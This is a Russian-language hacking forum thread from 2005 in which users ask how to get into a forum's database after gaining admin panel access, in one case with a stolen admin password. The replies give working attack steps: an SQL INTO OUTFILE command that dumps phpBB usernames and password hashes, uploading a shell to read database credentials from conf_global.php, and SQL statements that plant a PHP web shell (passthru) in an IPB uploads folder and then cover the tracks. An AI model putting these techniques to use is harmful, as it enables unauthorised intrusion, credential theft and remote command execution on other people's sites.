Форумы Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ?

Discussion in 'Уязвимости CMS/форумов' started by *Crimson*, 24 Dec 2005.

  1. *Crimson*

    *Crimson* New Member

    Joined:
    23 Dec 2005
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Можно ли ли получить доступ к Базе даных..имеея доступ к админке...в движке Ipb ?
     
  2. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    идем в SQL Management->mySQL Toolbox внизу в окне можно выполнять sql запросы.
     
    1 person likes this.
  3. vorishka

    vorishka Elder - Старейшина

    Joined:
    3 Mar 2005
    Messages:
    309
    Likes Received:
    43
    Reputations:
    22
    У некоторых там есть и бэкап БД где-то внизу...
     
    2 people like this.
  4. *Crimson*

    *Crimson* New Member

    Joined:
    23 Dec 2005
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    пасиба....
    счас посматрю...
     
  5. lka

    lka New Member

    Joined:
    15 Dec 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Такой же вопрос, только форум phpbb. Конкретно нужна таблица phpbb_users. Есть пароль одного из админов, могу заходить в админский раздел. При попытке сделать копию БД, частично копирует, потом пишет:
    SQL Error : 2013 Lost connection to MySQL server during query
    SELECT * FROM phpbb_posts
    и всё, видимо, битая таблица (при этом структуру БД копировать можно, а толку?). Сжатие в gzip не работает (сервер не отвечает). Если дописать phpbb_users как отдельную таблицу, то тоже не копирует, т. к. должен её прицеплять в конец, а затыкается раньше (SQL Error...).
    Версия форума 2.0.11. Кто-нибудь посоветовать что-то может?
     
  6. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    Если знаешь полный путь слей её в файл командой
    SELECT username,user_password INTO OUTFILE 'полный путь до файла' FROM phpbb_users
    При условии что можешь выполнять SQL команды
     
    _________________________
  7. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Если речь идёт о форумах IPB и есть возможность залить шелл, то заливаешь его, потом смотришь в корне форума в файле conf_global.php имя юзера и пароль БД, потом заливаешь урезанный PHPMyadmin от rst.void.ru, заходишь туда, вводишь логин и пасс и ты в БД и делай, что хочешь.
    Про репу не забываем, если хоть чем-то помог ;-)
     
  8. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    если конкретно для ipb то шел легко заливается командами (если хватит прав естессно)

    UPDATE ibf_members SET name='<? passthru("$cmd"); ?>'WHERE id='0';

    SELECT name FROM `ibf_members` WHERE id='0' INTO OUTFILE '/PATH_TO_FORUM/uploads/shell.php';

    потом прибираемся за собой
    UPDATE ibf_members SET name='Guest'WHERE id='0';

    и ищем наш шел в uploads
     
    1 person likes this.
  9. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    gzip отключи и будет тебе счастье в виде *.sql (вроде-бы);)